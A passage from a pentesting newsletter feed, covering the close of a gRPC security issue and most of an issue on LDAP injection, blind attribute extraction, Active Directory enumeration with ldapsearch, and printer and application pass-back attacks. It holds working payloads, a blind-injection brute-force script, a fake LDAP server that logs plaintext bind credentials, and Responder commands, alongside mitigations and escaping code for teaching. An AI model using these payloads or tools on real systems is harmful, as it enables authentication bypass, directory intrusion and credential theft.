**Testing strategy**: Try calling methods without metadata (no auth token). If successful, test with common metadata patterns like `Authorization: Bearer &lt;token&gt;` or custom headers like `x-api-key`. Many services inconsistently apply authentication across different methods.

### 3. Insecure Direct Object Reference (IDOR)

Just like REST APIs, gRPC services can have IDOR vulnerabilities if authorization checks are missing at the method level. Test by accessing your own resources first, then try accessing other users&apos; data by modifying ID parameters.

### 4. Metadata Injection

Metadata is like HTTP headers. If the server trusts metadata values without validation, you can inject malicious data.

**Common injection points**: SQL injection in custom metadata fields (e.g., `x-user-role: admin&apos; OR &apos;1&apos;=&apos;1`), command injection in tracing headers (e.g., `x-trace-id: $(whoami)`), and log injection in debugging metadata. Test any metadata field that gets processed server-side.

### 5. Protobuf Deserialization Issues

Protocol Buffers are generally safe, but misuse can lead to issues. Test with extreme values: maximum integers (9223372036854775807), negative numbers (-1), and out-of-range values. Schema type definitions don&apos;t guarantee server-side validation.

### 6. Denial of Service (DoS)

gRPC&apos;s bidirectional streaming can be abused by sending massive data streams. Also test with extremely large protobuf messages to trigger memory exhaustion. Use load testing tools like `ghz` (covered later) for systematic DoS testing.

### 7. Information Disclosure

gRPC error messages are verbose. Trigger errors with invalid input to check for stack traces (file paths, library versions), SQL errors (table names, columns), and internal service names.

## 🔨 Intercepting and Manipulating gRPC Traffic

### Using Burp Suite

Burp Suite supports HTTP/2, but gRPC traffic is binary. You need to decode it.

**Method 1: Burp Extensions**

Install the **gRPC Web Developer Tools** extension from BApp Store. It decodes protobuf messages automatically if you provide the .proto files.

**Method 2: Manual Decoding**

Capture HTTP/2 traffic in Burp. Use `protoc` to decode the binary data manually.

```bash
# Save the binary request body to a file
cat request.bin | protoc --decode=myapp.GetUserRequest user.proto
```
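One catch: the body you capture is not bare protobuf. gRPC wraps each message in a 5-byte prefix (one compressed-flag byte plus a big-endian 4-byte length), so strip the framing before handing the bytes to `protoc`. A sketch:

```python
import struct

def split_grpc_frames(body: bytes) -> list:
    """Split a captured gRPC body into (compressed?, message) tuples."""
    frames = []
    offset = 0
    while len(body) - offset >= 5:
        compressed = body[offset] == 1
        (length,) = struct.unpack(">I", body[offset + 1:offset + 5])
        frames.append((compressed, body[offset + 5:offset + 5 + length]))
        offset += 5 + length
    return frames

# One uncompressed frame carrying a 3-byte protobuf message
body = bytes([0, 0, 0, 0, 3]) + b"\x08\x96\x01"
print(split_grpc_frames(body))  # [(False, b'\x08\x96\x01')]
```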

### Using mitmproxy

mitmproxy has better HTTP/2 support than Burp for gRPC.

**Setup:**

```bash
# Install mitmproxy
pip install mitmproxy

# Start proxy (HTTP/2 support is enabled by default; no special mode needed)
mitmproxy -p 8080
```

**Configure client to use proxy:**

```bash
# Go-based gRPC clients (grpcurl included) honor the standard proxy variables
export HTTP_PROXY=http://localhost:8080
export HTTPS_PROXY=http://localhost:8080

# grpcurl has no dedicated proxy flag; it picks up the variables above
grpcurl -insecure target.com:443 list
```

### Using grpcui

For a more visual approach, grpcui provides a browser-based interface for testing gRPC services. See the Essential Tools section below for installation and usage.

## 🛠️ Essential Tools

**grpcurl**: The `curl` of gRPC. Essential command-line tool for enumeration and testing. Install: `go install github.com/fullstorydev/grpcurl/cmd/grpcurl@latest`

**grpcui**: Web-based UI for interactive gRPC testing. Much easier than crafting JSON manually. Install: `go install github.com/fullstorydev/grpcui/cmd/grpcui@latest`

**ghz**: Load testing tool for gRPC. Perfect for DoS testing and benchmarking. Install: `go install github.com/bojand/ghz/cmd/ghz@latest`

**Postman**: Now supports gRPC natively. Import .proto files and test with a familiar GUI.

**Burp Suite Extensions**: gRPC Web Developer Tools and Protobuf Decoder for intercepting and decoding traffic.

**protoc**: Protocol Buffer compiler for encoding/decoding messages manually. Install via `brew install protobuf` (macOS) or `apt-get install protobuf-compiler` (Linux).

**grpc_cli**: Official Google tool, similar to grpcurl. Requires gRPC C++ installation.

## 🧪 Labs and Practice

Honestly, there aren&apos;t many dedicated gRPC security labs out there yet. The technology is still relatively niche in the security training space. Here&apos;s what I found useful:

**gRPC Goat**

Intentionally vulnerable gRPC application for learning security testing.

Repository: [https://github.com/rootxjs/grpc-goat](https://github.com/rootxjs/grpc-goat)

Covers:
- Insecure reflection
- Missing authentication
- IDOR vulnerabilities
- Metadata injection
- Multiple CTF-style challenges

This is your best bet for hands-on gRPC security practice. The challenges are well-designed and cover real-world vulnerabilities.

**Build Your Own**

Since there aren&apos;t many public labs, building your own vulnerable gRPC service is valuable practice. Start with a simple Python service that has intentional vulnerabilities: no authentication, reflection enabled, and IDOR flaws. Use the gRPC Python quickstart guide and introduce vulnerabilities like missing metadata validation, unrestricted method access, and exposed reflection endpoints. Test with grpcurl to verify the vulnerabilities are exploitable.

## 🎯 Key Takeaways

gRPC is fundamentally different from REST. Binary encoding, HTTP/2 transport, and protobuf schemas mean you need different approaches for testing. Your usual tools and techniques need adjustment.

Reflection makes enumeration straightforward. When enabled, you can discover the full API surface instantly: services, methods, message types, everything. This is why reflection should be disabled in production, though it&apos;s sometimes left on accidentally.

Authentication and authorization patterns differ from traditional web apps. Many services assume gRPC is internal-only, which can lead to missing authentication controls. Always check method-level access controls, not just service-level ones.

Traditional security concepts still apply. IDOR, injection attacks via metadata, and DoS through streaming abuse are all possible. The transport layer is different, but the underlying security principles remain the same.

Tools make the difference. grpcurl and grpcui transform what would be tedious binary manipulation into manageable testing. Learning these tools is essential for working effectively with gRPC.

Error messages can reveal system information. gRPC error responses tend to be verbose, sometimes including stack traces, database errors, or internal service names. This information is valuable for understanding the system architecture.

.proto files are valuable resources. If you can find the protobuf schemas (from GitHub, client apps, or documentation), you have the complete API specification. This makes testing much more systematic and thorough.

## 📚 Further Reading

- **[gRPC Official Documentation](https://grpc.io/docs/)**: Complete reference for gRPC concepts and implementation
- **[grpcurl GitHub](https://github.com/fullstorydev/grpcurl)**: Essential command-line tool for gRPC testing
- **[grpcui GitHub](https://github.com/fullstorydev/grpcui)**: Web-based gRPC testing interface
- **[OWASP API Security Top 10](https://owasp.org/www-project-api-security/)**: Many principles apply to gRPC
- **[Protocol Buffers Documentation](https://protobuf.dev/)**: Understanding protobuf is crucial for gRPC testing
- **[Awesome gRPC Security](https://github.com/grpc-ecosystem/awesome-grpc#security)**: Curated list of gRPC security resources
- **[gRPC Security Guide by Trail of Bits](https://blog.trailofbits.com/2022/11/18/securing-grpc-communication/)**: Production security best practices
- **[HackTricks](https://book.hacktricks.wiki/)**: General pentesting techniques and resources

---

That&apos;s it for this week!

gRPC is becoming standard in microservice architectures. Kubernetes, Istio, Envoy, and countless backend services use it for inter-service communication. Understanding how to work with gRPC is increasingly important for security testing.

The learning curve is real. Binary protocols and protobuf schemas are different from JSON and REST. But once you understand the fundamentals and get comfortable with the tools, working with gRPC becomes much more approachable.

Start with grpcurl to understand the basics. Practice on lab environments. Learn how reflection works. Understand metadata patterns. Build your knowledge step by step.

Thanks for reading, and keep learning in 2026 🚀

— Ruben</content:encoded><category>Newsletter</category><category>api-security</category><author>Ruben Santos</author></item><item><title>LDAP Injection: Breaking Active Directory Authentication &amp; Enumeration</title><link>https://www.kayssel.com/newsletter/issue-30</link><guid isPermaLink="true">https://www.kayssel.com/newsletter/issue-30</guid><description>A deep dive into LDAP injection exploitation, blind LDAP attacks, advanced AD enumeration via LDAP queries, and pass-back attacks against LDAP servers</description><pubDate>Sun, 28 Dec 2025 09:00:00 GMT</pubDate><content:encoded>## 👋 Introduction

Hey everyone!

**This is the last newsletter of 2025.** I hope you&apos;re having great holidays with family and friends. Thanks for following along this year!

It&apos;s been a while since I&apos;ve touched Active Directory topics. The last AD-focused issue was **Issue 21** on NTLM Relay back in October. Since then we&apos;ve covered XXE, Docker escapes, prototype pollution, file uploads, and more. But I&apos;ve been missing the Windows world.

Here&apos;s the thing: Active Directory is everywhere in corporate environments. Every pentest involves AD in some form. And while Kerberos attacks and NTLM relay get attention, LDAP often flies under the radar.

LDAP (Lightweight Directory Access Protocol) is the backbone of AD. It&apos;s how applications query users, validate groups, and authenticate. Web apps, VPNs, wikis, ticket systems—they all talk to AD via LDAP.

LDAP injection is like SQL injection&apos;s less famous cousin. Same concept: untrusted input gets concatenated into queries, leading to authentication bypass, information disclosure, and privilege escalation. Developers who carefully parameterize SQL queries sometimes forget LDAP can be exploited the same way.

What makes LDAP injection particularly nasty is that LDAP servers contain **everything** about your target network. User accounts, password hashes, group memberships, GPOs, trust relationships. If you can manipulate LDAP queries, you can extract sensitive data or bypass authentication entirely.

Beyond injection, LDAP is a goldmine for enumeration. Even without vulnerabilities, you can abuse legitimate LDAP queries to map the entire AD structure. We covered basic AD enumeration in **Issue 19**, but this time we&apos;re going deep on LDAP-specific attacks.

We&apos;ll also cover **pass-back attacks**—a clever trick where you redirect LDAP authentication to a server you control, capturing credentials in plaintext. This works against network devices, printers, and enterprise applications.

**What we&apos;ll cover:**
- LDAP fundamentals and query syntax
- Classic and blind LDAP injection techniques
- Advanced AD enumeration via LDAP queries
- Pass-back attacks for credential capture
- Defense strategies and hands-on labs

If you&apos;re testing corporate networks or auditing enterprise applications with LDAP authentication, this is essential knowledge.

Let&apos;s break some directories 👇

## 🗂️ LDAP Fundamentals

Before we start breaking LDAP, let&apos;s talk about what it is and how it works. If you&apos;re already comfortable with LDAP syntax, skip ahead. But if LDAP queries look like cryptic hieroglyphs, this section is for you.

### What is LDAP?

LDAP (Lightweight Directory Access Protocol) is a protocol for accessing and maintaining directory services. Think of it like a phone book for your network. It stores information about users, computers, groups, and other resources in a hierarchical tree structure.

Active Directory uses LDAP as its primary query protocol. When you run `net user /domain` on Windows, that&apos;s an LDAP query under the hood. When a web app checks if a user belongs to the &quot;Admins&quot; group, that&apos;s LDAP. When you authenticate to a VPN using your domain credentials, that&apos;s LDAP.

LDAP runs on TCP port **389** (unencrypted) or **636** (LDAPS, encrypted with TLS). In AD environments, Domain Controllers listen on both ports.

### LDAP Directory Structure

LDAP data is organized in a tree called the **Directory Information Tree (DIT)**. The tree is made up of **entries**, and each entry has a **Distinguished Name (DN)** that uniquely identifies it.

**Example DN:**
```
CN=John Doe,OU=Users,OU=Corporate,DC=example,DC=com
```

**Breaking it down:**
- **CN** (Common Name): `John Doe`
- **OU** (Organizational Unit): `Users` (inside `Corporate`)
- **DC** (Domain Component): `example.com`

This DN represents a user object named &quot;John Doe&quot; in the &quot;Users&quot; OU of the &quot;Corporate&quot; OU in the `example.com` domain.
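A DN is just a comma-separated list of attribute=value pairs, so it is easy to pull apart programmatically. A naive sketch (real DNs can contain escaped commas, which this ignores):

```python
def parse_dn(dn: str) -> list:
    """Split a DN into (attribute, value) pairs. Naive: ignores escaped commas."""
    pairs = []
    for rdn in dn.split(","):
        attr, _, value = rdn.partition("=")
        pairs.append((attr.strip(), value.strip()))
    return pairs

dn = "CN=John Doe,OU=Users,OU=Corporate,DC=example,DC=com"
parts = parse_dn(dn)
print(parts[0])  # ('CN', 'John Doe')

# Rebuild the DNS domain from the DC components
domain = ".".join(value for attr, value in parts if attr == "DC")
print(domain)  # example.com
```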

### LDAP Queries and Filters

LDAP queries use **search filters** to find entries. Filters are written in a specific syntax with parentheses and logical operators.

**Basic filter examples:**

Find all users:
```
(objectClass=user)
```

Find a specific user by username:
```
(sAMAccountName=jdoe)
```

Find users in a specific group:
```
(memberOf=CN=Domain Admins,CN=Users,DC=example,DC=com)
```

**Logical operators:**

**AND** (`&amp;`):
```
(&amp;(objectClass=user)(sAMAccountName=jdoe))
```

**OR** (`|`):
```
(|(sAMAccountName=jdoe)(sAMAccountName=admin))
```

**NOT** (`!`):
```
(&amp;(objectClass=user)(!(userAccountControl:1.2.840.113556.1.4.803:=2)))
```
(This finds enabled user accounts by filtering out disabled ones)

### LDAP Attributes

Every LDAP entry has attributes. In Active Directory, user objects have attributes like:

- **sAMAccountName**: Username (e.g., `jdoe`)
- **userPrincipalName**: Email-style login (e.g., `jdoe@example.com`)
- **memberOf**: Groups the user belongs to
- **userAccountControl**: Account flags (disabled, locked, password expired, etc.)
- **pwdLastSet**: When password was last changed
- **adminCount**: If set to 1, user is/was a privileged account
- **servicePrincipalName**: SPNs for Kerberoasting (covered in Issue 2)

These attributes are what attackers extract during enumeration and what applications query during authentication.

### Authentication via LDAP

Here&apos;s how LDAP authentication typically works:

1. User submits username and password to an application
2. Application constructs an LDAP query to find the user:
   ```
   (&amp;(objectClass=user)(sAMAccountName=USERNAME))
   ```
3. If found, application attempts an LDAP **bind** operation with the user&apos;s DN and password
4. If bind succeeds, authentication is successful

This is where LDAP injection comes in. If the application doesn&apos;t sanitize `USERNAME`, an attacker can manipulate the filter to bypass authentication or extract information.

## 🔓 LDAP Injection: Authentication Bypass

LDAP injection works like SQL injection. If user input is concatenated directly into LDAP filters without sanitization, attackers can modify the query logic.

### Classic Authentication Bypass

Let&apos;s say an application uses this LDAP filter for authentication:

```
(&amp;(objectClass=user)(sAMAccountName=USERNAME)(userPassword=PASSWORD))
```

The application expects:
- Username: `jdoe`
- Password: `SecureP@ss123`

Resulting filter:
```
(&amp;(objectClass=user)(sAMAccountName=jdoe)(userPassword=SecureP@ss123))
```

But what if the attacker provides:
- Username: `jdoe)(&amp;)`
- Password: `anything`

The filter becomes:
```
(&amp;(objectClass=user)(sAMAccountName=jdoe)(&amp;))(userPassword=anything))
```

Breaking this down:
1. `(&amp;(objectClass=user)(sAMAccountName=jdoe)(&amp;))` - This is always TRUE
2. `(userPassword=anything))` - This is orphaned and ignored

The query returns the user `jdoe` **without validating the password**. Authentication bypassed.

### Example: Login Bypass

Imagine a web application with this vulnerable PHP code:

```php
&lt;?php
$username = $_POST[&apos;username&apos;];
$password = $_POST[&apos;password&apos;];

// VULNERABILITY: Direct concatenation without sanitization
$filter = &quot;(&amp;(objectClass=user)(uid=$username)(userPassword=$password))&quot;;

$ldap = ldap_connect(&quot;ldap://dc.example.com&quot;);
$bind = ldap_bind($ldap, &quot;cn=admin,dc=example,dc=com&quot;, &quot;admin_password&quot;);
$search = ldap_search($ldap, &quot;dc=example,dc=com&quot;, $filter);
$entries = ldap_get_entries($ldap, $search);

if ($entries[&apos;count&apos;] &gt; 0) {
    echo &quot;Login successful!&quot;;
} else {
    echo &quot;Invalid credentials.&quot;;
}
?&gt;
```

**Attack payload:**

Username: `admin)(&amp;)`
Password: anything (or empty)

The resulting filter:
```
(&amp;(objectClass=user)(uid=admin)(&amp;))(userPassword=))
```

The application searches for any user with `uid=admin` and the `(&amp;)` (always true) condition makes the filter match. Password check is bypassed.
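You can model both the bug and the fix in a few lines of Python. The sketch below uses a simplified single-condition filter; `escape_filter_value` implements the metacharacter escaping that RFC 4515 requires, which turns the payload into an inert literal:

```python
def build_filter_vulnerable(username: str) -> str:
    # Direct concatenation, exactly like the PHP snippet (simplified filter)
    return f"(uid={username})"

def escape_filter_value(value: str) -> str:
    """Escape LDAP filter metacharacters per RFC 4515."""
    for char, escaped in (("\\", r"\5c"), ("*", r"\2a"),
                          ("(", r"\28"), (")", r"\29"), ("\x00", r"\00")):
        value = value.replace(char, escaped)
    return value

def build_filter_safe(username: str) -> str:
    return f"(uid={escape_filter_value(username)})"

payload = "admin)(description=*"
print(build_filter_vulnerable(payload))  # (uid=admin)(description=*)
print(build_filter_safe(payload))        # (uid=admin\29\28description=\2a)
```

ldap3 ships the same escaping as `ldap3.utils.conv.escape_filter_chars`, and PHP has `ldap_escape()` with `LDAP_ESCAPE_FILTER`.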

### Wildcards for Enumeration

LDAP supports wildcards (`*`). This is useful for enumeration even when you can&apos;t bypass authentication directly.

**Example: Extracting usernames**

If you control the username field and the app returns different responses for valid vs invalid users, you can enumerate accounts:

Username: `a*`
Result: Returns users starting with &apos;a&apos;

Username: `admin*`
Result: Returns users starting with &apos;admin&apos;

You can brute-force character by character:
- `a*` → success → `aa*`, `ab*`, `ac*` → `ad*` → success → `adm*` → success → `admin` → **found**
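The walk is trivial to automate. In the sketch below, `oracle` is a local stand-in; on a real target it would submit the wildcard payload to the login form and inspect the response (the lowercase charset is an assumption, widen it as needed):

```python
import string

KNOWN_ACCOUNTS = {"admin", "alice", "jdoe"}  # stand-in for the directory

def oracle(prefix: str) -> bool:
    """True when `prefix*` matches an account. Replace with an HTTP probe."""
    return any(name.startswith(prefix) for name in KNOWN_ACCOUNTS)

def walk_username(prefix: str = "") -> str:
    """Extend the prefix one character at a time while the oracle matches."""
    while True:
        for char in string.ascii_lowercase:
            if oracle(prefix + char):
                prefix += char
                break
        else:
            return prefix  # no extension matched: the name is complete

print(walk_username("adm"))  # admin
```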

### OR Injection for Privilege Escalation

If you can inject an OR condition, you can match additional users beyond your own account.

**Example:**

Imagine the app searches for:
```
(&amp;(objectClass=user)(sAMAccountName=USERNAME)(memberOf=CN=Standard Users,DC=example,DC=com))
```

This restricts login to members of &quot;Standard Users&quot; group.

**Attack payload:**

Username: `attacker)(|(memberOf=CN=Domain Admins,DC=example,DC=com))(&amp;(sAMAccountName=`

Resulting filter:
```
(&amp;(objectClass=user)(sAMAccountName=attacker)(|(memberOf=CN=Domain Admins,DC=example,DC=com))(&amp;(sAMAccountName=)(memberOf=CN=Standard Users,DC=example,DC=com))
```

The injected OR clause displaces the original group check: the trailing `(&amp;(sAMAccountName=` fragment swallows the `Standard Users` condition into a dangling clause that never applies. On servers that tolerate the malformed remainder, the query effectively matches users named `attacker` OR members of `Domain Admins`. If the application does not re-validate group membership server-side, you might escalate privileges.

## 🕵️ Blind LDAP Injection

Sometimes you can inject into LDAP queries but can&apos;t see the results directly. The application doesn&apos;t display query output, but you can infer information based on timing, errors, or boolean responses (login success vs failure).

This is **blind LDAP injection**, analogous to blind SQL injection.

### Boolean-Based Blind LDAP Injection

If the application behaves differently when a query matches vs doesn&apos;t match, you can extract data one bit at a time.

**Scenario:**

The app shows &quot;User exists&quot; or &quot;User not found&quot; based on LDAP query results, but doesn&apos;t show the actual data.

**Attack technique:**

Extract the admin password hash character by character using wildcards.

**Example:**

Assume the LDAP filter is:
```
(sAMAccountName=USERNAME)
```

**Payload 1** (username input `admin)(userPassword=a*`, producing the filter):
```
(sAMAccountName=admin)(userPassword=a*)
```

If response is &quot;User exists&quot;, the password starts with `a`. If not, try `b*`, `c*`, etc.

**Payload 2** (username input `admin)(userPassword=ab*`):
```
(sAMAccountName=admin)(userPassword=ab*)
```

Continue brute-forcing character by character.

### Time-Based Blind LDAP Injection

Some LDAP servers (especially AD) have performance differences based on query complexity. By injecting filters that cause the server to process large result sets, you can infer information based on response time.

This is less reliable than boolean-based attacks but can work when you have no other feedback.

**Example:**

Inject a filter that matches all users:
```
(sAMAccountName=*)(objectClass=user)
```

If this causes a delay compared to a filter that matches no users, you can infer the query executed.

### Extracting Information with Blind Injection

Let&apos;s say you want to extract the `description` attribute of the `admin` user.

**Filter construction:**
```
(&amp;(sAMAccountName=admin)(description=A*))
```

If the response indicates success (login works, or &quot;user found&quot;), the description starts with &apos;A&apos;. If not, try &apos;B&apos;, &apos;C&apos;, etc.

Once you find the first character, move to the second:
```
(&amp;(sAMAccountName=admin)(description=Aa*))
(&amp;(sAMAccountName=admin)(description=Ab*))
```

This is tedious, but scriptable.

### Tools for Blind LDAP Injection

Manual exploitation is slow. Automate it with scripts.

**Python Example (Boolean-Based):**

```python
import requests
import string

# Characters to test (alphanumeric + special chars)
charset = string.ascii_letters + string.digits + &quot;_-@.&quot;

def test_char(known, char):
    payload = f&quot;admin)(description={known}{char}*&quot;
    response = requests.post(&quot;https://target.com/login&quot;, data={
        &quot;username&quot;: payload,
        &quot;password&quot;: &quot;anything&quot;
    })
    # Adjust based on application response
    return &quot;User exists&quot; in response.text

def extract_description():
    known = &quot;&quot;
    while True:
        found = False
        for char in charset:
            if test_char(known, char):
                known += char
                print(f&quot;[+] Found: {known}&quot;)
                found = True
                break
        if not found:
            break
    return known

admin_description = extract_description()
print(f&quot;[+] Admin description: {admin_description}&quot;)
```

This script brute-forces the `description` attribute character by character.

## 🔍 Advanced AD Enumeration via LDAP

Even without injection vulnerabilities, you can abuse legitimate LDAP queries to map Active Directory. If you have valid domain credentials (even low-privilege), you can query LDAP for sensitive information.

This goes beyond basic enumeration (covered in Issue 19) and focuses on LDAP-specific techniques.

### Authenticated LDAP Queries

Once you have credentials (via phishing, password spraying, or compromising a workstation), you can bind to LDAP and run queries.

**Using ldapsearch (Linux):**

```bash
ldapsearch -x -H ldap://dc.example.com -D &quot;CN=John Doe,CN=Users,DC=example,DC=com&quot; -w &apos;password&apos; -b &quot;DC=example,DC=com&quot; &quot;(objectClass=user)&quot;
```

**Flags:**
- `-x`: Simple authentication
- `-H`: LDAP server
- `-D`: Bind DN (your user)
- `-w`: Password
- `-b`: Base DN (search root)
- Filter: `(objectClass=user)`

This dumps all user objects in the domain.

### Enumerating High-Value Targets

**Find Domain Admins:**

```bash
ldapsearch -x -H ldap://dc.example.com -D &quot;CN=John Doe,CN=Users,DC=example,DC=com&quot; -w &apos;password&apos; -b &quot;DC=example,DC=com&quot; &quot;(memberOf=CN=Domain Admins,CN=Users,DC=example,DC=com)&quot; sAMAccountName
```

This lists all members of the &quot;Domain Admins&quot; group.

**Find users with adminCount=1:**

```bash
ldapsearch -x -H ldap://dc.example.com -D &quot;CN=John Doe,CN=Users,DC=example,DC=com&quot; -w &apos;password&apos; -b &quot;DC=example,DC=com&quot; &quot;(adminCount=1)&quot; sAMAccountName
```

Users with `adminCount=1` are (or were) members of protected groups like Domain Admins, Enterprise Admins, or Administrators. Even if they&apos;re no longer in those groups, they often retain elevated privileges due to misconfigured ACLs.

**Find accounts with SPNs (Kerberoastable):**

```bash
ldapsearch -x -H ldap://dc.example.com -D &quot;CN=John Doe,CN=Users,DC=example,DC=com&quot; -w &apos;password&apos; -b &quot;DC=example,DC=com&quot; &quot;(&amp;(objectClass=user)(servicePrincipalName=*))&quot; sAMAccountName servicePrincipalName
```

This identifies accounts vulnerable to Kerberoasting (covered in Issue 2).

**Find computers:**

```bash
ldapsearch -x -H ldap://dc.example.com -D &quot;CN=John Doe,CN=Users,DC=example,DC=com&quot; -w &apos;password&apos; -b &quot;DC=example,DC=com&quot; &quot;(objectClass=computer)&quot; dNSHostName operatingSystem
```

This lists all domain-joined computers with their OS version (useful for targeting outdated systems).

### Extracting Password Policy

LDAP can reveal the domain password policy without privileged access:

```bash
ldapsearch -x -H ldap://dc.example.com -D &quot;CN=John Doe,CN=Users,DC=example,DC=com&quot; -w &apos;password&apos; -b &quot;DC=example,DC=com&quot; &quot;(objectClass=domain)&quot; minPwdLength maxPwdAge lockoutThreshold
```

**Attributes:**
- `minPwdLength`: Minimum password length
- `maxPwdAge`: Password expiration time
- `lockoutThreshold`: Failed login attempts before lockout

This tells you how complex passwords need to be and helps avoid account lockouts during password spraying.
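One conversion gotcha: `maxPwdAge` comes back as a negative count of 100-nanosecond intervals, not seconds, so translate it before reading it:

```python
def max_pwd_age_days(raw: int) -> float:
    """Convert maxPwdAge (negative 100-nanosecond intervals) to days."""
    seconds = abs(raw) / 10_000_000  # ten million 100-ns units per second
    return seconds / 86_400

# A common policy: passwords expire every 42 days
print(max_pwd_age_days(-36288000000000))  # 42.0
```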

### Finding Privileged Groups

Besides &quot;Domain Admins&quot;, there are other high-value groups:

```bash
ldapsearch -x -H ldap://dc.example.com -D &quot;CN=John Doe,CN=Users,DC=example,DC=com&quot; -w &apos;password&apos; -b &quot;DC=example,DC=com&quot; &quot;(|(cn=Enterprise Admins)(cn=Schema Admins)(cn=Account Operators)(cn=Backup Operators))&quot; member
```

This lists members of multiple privileged groups in one query.

### Identifying Delegation

**Unconstrained Delegation** (very dangerous):

```bash
ldapsearch -x -H ldap://dc.example.com -D &quot;CN=John Doe,CN=Users,DC=example,DC=com&quot; -w &apos;password&apos; -b &quot;DC=example,DC=com&quot; &quot;(&amp;(objectClass=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))&quot; dNSHostName
```

Computers with unconstrained delegation can impersonate any user. If you compromise one of these systems, you can capture TGTs and impersonate domain admins.

**Constrained Delegation:**

```bash
ldapsearch -x -H ldap://dc.example.com -D &quot;CN=John Doe,CN=Users,DC=example,DC=com&quot; -w &apos;password&apos; -b &quot;DC=example,DC=com&quot; &quot;(msDS-AllowedToDelegateTo=*)&quot; sAMAccountName msDS-AllowedToDelegateTo
```

This finds accounts with constrained delegation configured.
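The magic numbers in these filters are `userAccountControl` bit flags, matched with the bitwise-AND rule OID `1.2.840.113556.1.4.803` (2 = ACCOUNTDISABLE, 524288 = TRUSTED_FOR_DELEGATION). A small decoder keeps query results readable:

```python
# Subset of userAccountControl flags useful during enumeration
UAC_FLAGS = {
    2: "ACCOUNTDISABLE",
    512: "NORMAL_ACCOUNT",
    65536: "DONT_EXPIRE_PASSWORD",
    524288: "TRUSTED_FOR_DELEGATION",  # unconstrained delegation
    4194304: "DONT_REQ_PREAUTH",       # AS-REP roastable
}

def decode_uac(value: int) -> list:
    """Return the names of all flags set in a userAccountControl value."""
    return [name for bit, name in sorted(UAC_FLAGS.items())
            if (value // bit) % 2 == 1]

# 512 + 524288: a normal account trusted for unconstrained delegation
print(decode_uac(524800))  # ['NORMAL_ACCOUNT', 'TRUSTED_FOR_DELEGATION']
```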

### Extracting Descriptions and Comments

Admins sometimes put sensitive info in user descriptions:

```bash
ldapsearch -x -H ldap://dc.example.com -D &quot;CN=John Doe,CN=Users,DC=example,DC=com&quot; -w &apos;password&apos; -b &quot;DC=example,DC=com&quot; &quot;(objectClass=user)&quot; sAMAccountName description
```

Look for things like:
- &quot;Default password: Summer2024&quot;
- &quot;Backup account - pwd never expires&quot;
- &quot;Service account for SQL - check vault&quot;

I&apos;ve seen this more times than I care to admit.

### Scripting LDAP Enumeration

Manual queries are tedious. Automate with **ldapdomaindump**:

```bash
ldapdomaindump -u &apos;example.com\jdoe&apos; -p &apos;password&apos; dc.example.com -o /tmp/ldap_dump
```

This creates HTML and JSON files with:
- Users
- Groups
- Computers
- Trusts
- GPOs

It&apos;s like running all the queries above in one command.

## 🎣 Pass-Back Attacks

Pass-back attacks exploit devices and applications that support LDAP authentication. The idea: change the LDAP server configuration to point to an attacker-controlled server, then trigger an authentication attempt. The device sends credentials to your server instead of the real LDAP server.

This works against:
- Network printers with LDAP/SMB authentication
- Enterprise applications (wikis, ticketing systems)
- Network devices (routers, switches with LDAP auth)
- Embedded systems with LDAP configuration

### How It Works

1. Access the device&apos;s configuration (web interface, SNMP, default creds)
2. Change LDAP server address to your IP
3. Trigger authentication (print a test page, login attempt, etc.)
4. Device sends credentials to your fake LDAP server
5. Capture plaintext credentials

### Example: Printer Pass-Back

Many network printers support &quot;Scan to Folder&quot; features that authenticate to network shares via LDAP.

**Attack steps:**

1. Access printer web interface (often no password, or default `admin/admin`)
2. Navigate to LDAP/Network settings
3. Change LDAP server to attacker IP: `10.10.14.5`
4. Leave credentials fields as-is (they contain service account creds)
5. Save and trigger a scan

The printer attempts to authenticate to your IP with the configured credentials.

**Capture with Responder:**

```bash
sudo responder -I eth0 -v
```

Responder listens for LDAP, SMB, HTTP authentication attempts and captures credentials.

**Or set up a fake LDAP server:**

```bash
# Simple LDAP server that logs authentication attempts
sudo apt install slapd
```

Configure `slapd` to log bind attempts, or listen with a minimal Python socket server. ldap3 is a client library and cannot act as a server, so instead of speaking LDAP we just dump the raw bind request; simple binds carry the bind DN and password in plaintext inside the BER-encoded bytes:

```python
import socket

def fake_ldap_server(host=&quot;0.0.0.0&quot;, port=389):
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        s.bind((host, port))
        s.listen(5)
        print(f&quot;[+] Fake LDAP server listening on {host}:{port}&quot;)
        while True:
            client, addr = s.accept()
            data = client.recv(4096)
            # Simple bind requests are BER-encoded; the bind DN and password
            # appear as plain ASCII inside the raw bytes
            print(f&quot;[+] Bind attempt from {addr[0]}: {data!r}&quot;)
            client.close()

fake_ldap_server()
```

### Example: Application Pass-Back

Many enterprise apps (Jira, Confluence, GitLab, etc.) support LDAP authentication.

If you compromise an admin account on the app (or find default creds), you can:

1. Navigate to LDAP configuration
2. Change LDAP server to your IP
3. Change LDAP bind DN to a high-privilege account (e.g., `CN=ldapbind,CN=Users,DC=example,DC=com`)
4. Leave password field populated (app stores it)
5. Save settings
6. Trigger LDAP sync or test connection

The app sends the bind credentials to your server.

### Defensive Considerations

**Why does this work?**
- Devices store credentials in plaintext or reversible encryption
- LDAP authentication uses plaintext passwords during bind (unless LDAPS)
- Many devices trust network configuration without validation

**Mitigations:**
- Use LDAPS (LDAP over TLS) to encrypt credentials in transit
- Restrict access to device configuration interfaces
- Use least-privilege service accounts for LDAP binds
- Monitor for LDAP authentication to external IPs

## 🛠️ Tools for LDAP Exploitation

Here are the essential tools for LDAP injection and enumeration:

### Enumeration Tools

**ldapsearch** (Built-in on Linux)
```bash
ldapsearch -x -H ldap://dc.example.com -D &quot;user@example.com&quot; -w &apos;password&apos; -b &quot;DC=example,DC=com&quot; &quot;(objectClass=user)&quot;
```

**ldapdomaindump** (Automated enumeration)
```bash
pip install ldapdomaindump
ldapdomaindump -u &apos;example.com\user&apos; -p &apos;password&apos; dc.example.com
```

**Windapsearch** (Windows-focused LDAP queries)
```bash
windapsearch -d example.com -u user@example.com -p password --dc 10.10.10.10 -m users
```

Options:
- `-m users`: Enumerate users
- `-m groups`: Enumerate groups
- `-m computers`: Enumerate computers
- `-m privileged-users`: Find admin accounts

**BloodHound** (Graph-based AD analysis)

While BloodHound uses multiple protocols (LDAP, SMB, etc.), it heavily relies on LDAP for enumeration.

```bash
bloodhound-python -u user -p password -d example.com -dc dc.example.com -c all
```

Import JSON files into BloodHound GUI to visualize attack paths.

### Credential Capture

**Responder** (LLMNR/NBT-NS/LDAP poisoning)
```bash
sudo responder -I eth0 -v
```
